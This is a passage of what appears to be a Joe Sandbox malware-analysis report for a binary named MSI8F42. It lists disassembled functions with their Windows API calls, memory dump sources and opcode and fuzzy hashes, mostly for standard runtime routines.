                                                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                            • String ID: utf8
                                                                                                                                            • API String ID: 4147378913-905460609
                                                                                                                                            • Opcode ID: 0482975faeb0f71eb1f7c8ebe9d1208e3c3e4c4adab852418aa305f7680e47e4
                                                                                                                                            • Instruction ID: 97468ac16336f34ea86f4aafb5de55a82b14cfbec6e6fe2f0499bdd603b16ecd
                                                                                                                                            • Opcode Fuzzy Hash: 0482975faeb0f71eb1f7c8ebe9d1208e3c3e4c4adab852418aa305f7680e47e4
                                                                                                                                            • Instruction Fuzzy Hash: EE710872600321AADB27AB75EC46BAB73ACEF14700F164429F505DF181FBB4DD418750
                                                                                                                                            Function 002F3860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,7642E7B1,?), ref: 002F38CB
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002F390B
                                                                                                                                            • Process32FirstW.KERNEL32(?,00000000), ref: 002F395F
                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 002F397A
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002F3A8E
                                                                                                                                            • Process32NextW.KERNEL32(?,00000000), ref: 002F3AA2
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 002F3AF0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 708755948-0
                                                                                                                                            • Opcode ID: 93282f08fb946bbb94913c62f322ad5c6c2ecac8ee2fb31cd5e31f2b29608874
                                                                                                                                            • Instruction ID: e45923d99287d20774643ec0e54910d251b07595495e57bd0a1536c42ce73733
                                                                                                                                            • Opcode Fuzzy Hash: 93282f08fb946bbb94913c62f322ad5c6c2ecac8ee2fb31cd5e31f2b29608874
                                                                                                                                            • Instruction Fuzzy Hash: 55A11AB591124DDFDF11CFA5D988BEEBBF8BF48304F144169E905AB240D7B49A44CBA0
                                                                                                                                            Function 0032F032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                            • Opcode ID: 3671fe3ab2a430c9af524975a5392690b3920585d2af6b3259946b128feb46fa
                                                                                                                                            • Instruction ID: 6213973d7afd906d4d24c3dd229f991d66ccdeb50e7a53cefa3894d7369c40fd
                                                                                                                                            • Opcode Fuzzy Hash: 3671fe3ab2a430c9af524975a5392690b3920585d2af6b3259946b128feb46fa
                                                                                                                                            • Instruction Fuzzy Hash: 56D23C71E086288FDB6ACE28DD907EAB7B9EB44304F1545FAD84DE7240D774AE818F41
                                                                                                                                            Function 0032E5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,0032E8D1,00000002,00000000,?,?,?,0032E8D1,?,00000000), ref: 0032E64C
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,0032E8D1,00000002,00000000,?,?,?,0032E8D1,?,00000000), ref: 0032E675
                                                                                                                                            • GetACP.KERNEL32(?,?,0032E8D1,?,00000000), ref: 0032E68A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                            • Opcode ID: 5874d681dbe531fc52e827a1c9c7b50510828c3def1aeff3cf7fc3bf55daf3d0
                                                                                                                                            • Instruction ID: 2ef8d69e3e5ca5c15117e6e9697bc9c18f864542ae4fb1a44d2a0c450da15b7c
                                                                                                                                            • Opcode Fuzzy Hash: 5874d681dbe531fc52e827a1c9c7b50510828c3def1aeff3cf7fc3bf55daf3d0
                                                                                                                                            • Instruction Fuzzy Hash: 7821B072B10120AADB37CF14E902A97B3AAAB74F64F578464E90AD7510E732DD40C350
                                                                                                                                            Function 002F9CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _swprintf$FreeLocal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2429749586-0
                                                                                                                                            • Opcode ID: 0843c15cefdaec457f8203713ff2471fc40a335e104191cd37d4547dc4465548
                                                                                                                                            • Instruction ID: 008b7902ec3fae4d7a8b45dae617e45a2cc9c42aafcdf55bc90757be128055f0
                                                                                                                                            • Opcode Fuzzy Hash: 0843c15cefdaec457f8203713ff2471fc40a335e104191cd37d4547dc4465548
                                                                                                                                            • Instruction Fuzzy Hash: EFF1AE71D2021DABDF19DFA8DC40BAEFBB9FB08340F144229F905AB281D775A951CB91
                                                                                                                                            Function 0032E788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0032E894
                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0032E8DD
                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0032E8EC
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0032E934
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0032E953
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                            • Opcode ID: c63bd99b34d7672a9f01dcc00d2a2caa64448c66512bf3dba4646b0ea0f37af1
                                                                                                                                            • Instruction ID: 88435ca2c78cea5980b94417217259fec34c49529ac7f46372d0945e1876d3e5
                                                                                                                                            • Opcode Fuzzy Hash: c63bd99b34d7672a9f01dcc00d2a2caa64448c66512bf3dba4646b0ea0f37af1
                                                                                                                                            • Instruction Fuzzy Hash: 80517471A00225AFEF22DFA5EC46ABE73B8FF48B00F154069E950EB190D770D940CB61
                                                                                                                                            Function 002F2310 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 64memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00312C98: EnterCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CA3
                                                                                                                                              • Part of subcall function 00312C98: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CE0
                                                                                                                                            • GetProcessHeap.KERNEL32 ref: 002F2365
                                                                                                                                              • Part of subcall function 00312C4E: EnterCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C58
                                                                                                                                              • Part of subcall function 00312C4E: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C8B
                                                                                                                                              • Part of subcall function 00312C4E: RtlWakeAllConditionVariable.NTDLL ref: 00312D02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                            • String ID: <4$X4$\L4$pL4
                                                                                                                                            • API String ID: 325507722-3709691910
                                                                                                                                            • Opcode ID: 00e61b9479c710c1e7ac5103583e1794a296d9b896bdfb818e343722d69dbff1
                                                                                                                                            • Instruction ID: 348dc4d5e99d87be8f5552cb4ed3cff8371d8306475200ed9fb63f95b30bb732
                                                                                                                                            • Opcode Fuzzy Hash: 00e61b9479c710c1e7ac5103583e1794a296d9b896bdfb818e343722d69dbff1
                                                                                                                                            • Instruction Fuzzy Hash: 2C219AB5901200DBD312CF58EC4678AB7F8F726720F024268E9299F2E0DB7838188F52
                                                                                                                                            Function 00325D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                            • Instruction ID: b2dc61aead54ffea137336de239e7843ae870aa2faa470251fcba11c0deed841
                                                                                                                                            • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                            • Instruction Fuzzy Hash: A5B139729056659FDB17CF68D882BFEBBA5EF59310F168169E804EF241D234DE01CBA0
                                                                                                                                            Function 003133A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003133B4
                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00313480
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003134A0
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 003134AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                            • Opcode ID: ef44ea112e84ca1deabd691ea10f77295a7c9dc0f329b94c0baa36b067b5fcba
                                                                                                                                            • Instruction ID: b972d19d943b0b9df3b19fd8b111d487d7710577b8980fc1d381403fdbb6c358
                                                                                                                                            • Opcode Fuzzy Hash: ef44ea112e84ca1deabd691ea10f77295a7c9dc0f329b94c0baa36b067b5fcba
                                                                                                                                            • Instruction Fuzzy Hash: D7312CB5D0521C9BDB21DF64D9897CDBBB8AF08304F1040DAE50DAB250EB719B85DF44
                                                                                                                                            Function 002FD0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 002FC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,7642E7B1,?,00333D30,000000FF), ref: 002FC657
                                                                                                                                              • Part of subcall function 002FC630: GetLastError.KERNEL32(?,00000000,00000000,7642E7B1,?,00333D30,000000FF), ref: 002FC661
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,00348AF0), ref: 002FD0D8
                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00348AF0), ref: 002FD0E7
                                                                                                                                            Strings
                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002FD0E2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                            • API String ID: 3511171328-631824599
                                                                                                                                            • Opcode ID: 50c38836ec33213282742fb0ccef94d717e503924f1b238978f7765ce1fb0681
                                                                                                                                            • Instruction ID: 533397feb0a8d65f174c1ea931bcac3cd9385bdc23f9aea0e2fc13f9e1efb9ca
                                                                                                                                            • Opcode Fuzzy Hash: 50c38836ec33213282742fb0ccef94d717e503924f1b238978f7765ce1fb0681
                                                                                                                                            • Instruction Fuzzy Hash: 9DE06DB02147458FE3319F28D888752BBE8AB11784F00886CE956C3250DBB5E4488BA1
                                                                                                                                            Function 0032E237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032E28B
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032E2D5
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032E39B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 661929714-0
                                                                                                                                            • Opcode ID: fbf15ab5a517aea4f4850ccebb6c57927faa292608afabe2cc3ae837cf18396b
                                                                                                                                            • Instruction ID: 130a48be893f76c109f2fcb922ef86a4d731084f21b14cc25d86dcfda5a492ce
                                                                                                                                            • Opcode Fuzzy Hash: fbf15ab5a517aea4f4850ccebb6c57927faa292608afabe2cc3ae837cf18396b
                                                                                                                                            • Instruction Fuzzy Hash: 5661BF719002279BEB2AEF29EC83BBA73A8FF08301F154179E915CB581E734D984DB50
                                                                                                                                            Function 00316E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00316F13
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00316F1D
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,?), ref: 00316F2A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: f1e9ee5cf3d481facab13f77dc8312af881d952f91b99c74a7e485167e94c5ea
                                                                                                                                            • Instruction ID: cf22bca4924d84691b4fc3d699c6aeaa87a8dc75e58ffd37cf080f7111c3e629
                                                                                                                                            • Opcode Fuzzy Hash: f1e9ee5cf3d481facab13f77dc8312af881d952f91b99c74a7e485167e94c5ea
                                                                                                                                            • Instruction Fuzzy Hash: 8031B2B5901228ABCB26DF68D9897DDBBB8AF08310F5041EAE41CA6250E7709B818F44
                                                                                                                                            Function 002F45B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,7642E7B1,00000001,00000000,?,00000000,00334460,000000FF,?,002F474D,002F3778,?,00000000,00000000,?), ref: 002F45DB
                                                                                                                                            • LockResource.KERNEL32(00000000,?,00000000,00334460,000000FF,?,002F474D,002F3778,?,00000000,00000000,?,?,?,?,002F3778), ref: 002F45E6
                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00334460,000000FF,?,002F474D,002F3778,?,00000000,00000000,?,?,?), ref: 002F45F4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$LoadLockSizeof
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2853612939-0
                                                                                                                                            • Opcode ID: 1e77ac025f72c310c1dc008d4e41f0b877902571d601b317787b380c0fe37794
                                                                                                                                            • Instruction ID: 53c5372a1dda987a223c275e9e0a98bedba4a1bdf09b1feab946f907fd537d29
                                                                                                                                            • Opcode Fuzzy Hash: 1e77ac025f72c310c1dc008d4e41f0b877902571d601b317787b380c0fe37794
                                                                                                                                            • Instruction Fuzzy Hash: 07112372A046599BD7359F19DC84B77F3ACE786B68F00053AED2AC3340EA75AC008690
                                                                                                                                            Function 0032E111 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0032E237,00000001,00000000,?,-00000050,?,0032E868,00000000,?,?,?,00000055,?), ref: 0032E183
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                            • String ID: h2
                                                                                                                                            • API String ID: 2417226690-3066208935
                                                                                                                                            • Opcode ID: d58dd2f8e2b554f6213a67038dd7e4f059720dfcd0d4be39783f3cd58806ec9b
                                                                                                                                            • Instruction ID: d3a9cc15423e814767b805d9683b01d6b5f34776ceee90f4192769258d0df798
                                                                                                                                            • Opcode Fuzzy Hash: d58dd2f8e2b554f6213a67038dd7e4f059720dfcd0d4be39783f3cd58806ec9b
                                                                                                                                            • Instruction Fuzzy Hash: A111293B2007119FDB19AF38D8A25BAB791FF84719B15443CE54747B40D3717942CB40
                                                                                                                                            Function 003276AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00324E3F,?,20001004,00000000,00000002,?,?,00324441), ref: 003276E3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2299586839-1316489359
                                                                                                                                            • Opcode ID: 0f60348e1698ee8118ea541aa3bdd150827e32fe84d431e69c1fef5a37ce6b68
                                                                                                                                            • Instruction ID: f8f4d9f84400666d3aab82c3d1cc32c29feda5dbd04c0b41a09edc37d9252edc
                                                                                                                                            • Opcode Fuzzy Hash: 0f60348e1698ee8118ea541aa3bdd150827e32fe84d431e69c1fef5a37ce6b68
